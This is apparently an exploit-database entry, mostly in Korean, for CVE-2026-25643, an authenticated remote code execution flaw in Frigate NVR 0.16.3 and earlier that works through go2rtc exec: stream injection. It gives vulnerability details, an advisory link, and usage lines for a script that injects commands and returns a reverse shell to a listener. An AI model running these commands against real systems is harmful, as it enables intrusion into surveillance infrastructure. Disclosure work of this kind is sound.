
go2rtc exec를 통한 Frigate NVR 인증 RCE 익스플로잇: 프로토콜 주입, 시스템 명령 실행 및 리버스 셸 캡처 자동화.
Exploit Title: Frigate NVR <= 0.16.3 - 인증된 원격 코드 실행
Date: 2026-02-05
Exploit Author: jduardo2704
Vendor Homepage: https://frigate.video/
Software Link: https://github.com/blakeblackshear/frigate
Version: <= 0.16.3
CVE: CVE-2026-25643
Advisory: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Frigate 0.16.3 이하 버전은 go2rtc 구성을 통해 원격 코드 실행(RCE) 취약점이 있습니다. 인증된 액세스 권한을 가진 공격자(또는 인스턴스가 노출된 경우 인증되지 않은 공격자)는 exec: 프로토콜을 사용하여 스트림 구성에 시스템 명령을 주입할 수 있습니다. 이 익스플로잇은 페이로드 주입을 자동화하고, 서비스를 재시작한 다음 리버스 셸을 획득합니다.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
이 스크립트는 교육 목적 및 승인된 보안 테스트에만 사용해야 합니다.